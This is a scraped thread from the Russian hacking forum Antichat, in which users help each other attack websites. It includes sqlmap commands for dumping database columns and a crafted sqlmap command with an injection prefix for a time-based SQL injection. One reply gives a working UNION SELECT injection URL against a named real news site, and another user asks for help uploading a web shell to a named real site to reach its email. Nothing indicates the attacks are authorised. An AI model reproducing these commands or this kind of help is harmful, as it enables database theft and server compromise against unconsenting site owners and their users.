HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23221  
Старый 23.01.2014, 18:04
nike001
Новичок
Регистрация: 19.01.2014
Сообщений: 17
Провел на форуме:
5283

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
Браузер
Всмысле браузер? В настройках Javascript включён.
 
Ответить с цитированием

  #23222  
Старый 23.01.2014, 18:22
K800
Флудер
Регистрация: 25.12.2010
Сообщений: 2,173
Провел на форуме:
697724

Репутация: 372


По умолчанию

nike001,

http://forum.antichat.net/showthread.php?t=20140

Цитата:
Сообщение от lіgendо  
лучше в опере пробовать, хромы и фф режут хсс
Цитата:
Сообщение от M_script  
Opera 12.x в идеале. Лень объяснять, кто знает - поймет, кто захочет - поверит, остальные - лесом.
 
Ответить с цитированием

  #23223  
Старый 24.01.2014, 22:17
erwap
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084

Репутация: 0
По умолчанию

Подскажите по sqlmap.

Задача: сдампить определенные колонки в таблице

Код:
python sqlmap.py -u http://site.ru?a=inject --dump -D db_name -T table_name -C column1
В вышеприведенном коде сдампится column1 , а мне нужно еще column2. Как синтаксически правильно дописать вторую колонку?
 
Ответить с цитированием

  #23224  
Старый 25.01.2014, 02:05
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

erwap

-C "column1,column2,column3"
 
Ответить с цитированием

  #23225  
Старый 25.01.2014, 12:01
2fed
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044

Репутация: 21
По умолчанию

1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&Sectio nID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac

не как не смог сглмапом так же Хавижом( в чем проблема не пойму(

2) aztexnika.az/upload.php

aztexnika.az/admin/upload.php

нужно залить шелл. нужен доступ емаилу с этого сайта(
 
Ответить с цитированием

  #23226  
Старый 25.01.2014, 17:43
BigBanMan
Новичок
Регистрация: 13.04.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Есть уязвимость. SQLi

Предположим так (заменил дабы не палить):

Url: http://www.site.com/threadrate.php?t=104496

Method: post

Param: securitytoken

Payload: "));SELECT+SLEEP(15)/*

Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5

как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.

А без него уязвимость не видит. Прошу, помогите
 
Ответить с цитированием

  #23227  
Старый 25.01.2014, 20:33
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBanMan  
Есть уязвимость. SQLi
Предположим так (заменил дабы не палить):
Url: http://www.site.com/threadrate.php?t=104496
Method: post
Param: securitytoken
Payload: "));SELECT+SLEEP(15)/*
Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5
как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
А без него уязвимость не видит. Прошу, помогите
Прежде чем говорить - проверьте.

Код HTML:
sqlmap --help
За payload отвечает две опции:

--prefix=PREFIX Injection payload prefix string

--suffix=SUFFIX Injection payload suffix string

соответственно Ваш запрос будет примерно таким:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://www.site.com/threadrate.php?t=104496"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"securitytoken=guest*&t=104496&pp=10&page=1&vote=5"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"));"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"MySQL"[/COLOR][/COLOR
 
Ответить с цитированием

  #23228  
Старый 25.01.2014, 21:29
BigBanMan
Новичок
Регистрация: 13.04.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zed0x  
Прежде чем говорить - проверьте.
Код HTML:
sqlmap --help
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://www.site.com/threadrate.php?t=104496"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"securitytoken=guest*&t=104496&pp=10&page=1&vote=5"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"));"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"MySQL"[/COLOR][/COLOR
Для начала спасибо вам, попробую.

А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:

Payload: '"%2bSLEEP(15)--

то команда будет включать

Код:
--prefix=""%2b"
?
 
Ответить с цитированием

  #23229  
Старый 26.01.2014, 00:48
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

Цитата:
Сообщение от 2fed  
1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&Sectio nID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac
не как не смог сглмапом так же Хавижом( в чем проблема не пойму(
Проблема в отсутствии знаний.

http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode= allwords&SectionID=-1&Lang=_Ru
 
Ответить с цитированием

  #23230  
Старый 26.01.2014, 02:00
2fed
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
304044

Репутация: 21
По умолчанию

Цитата:
Сообщение от Tigger  
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=
%Inject_Here%
&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode= allwords&SectionID=-1&Lang=_Ru
опять ничего(
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.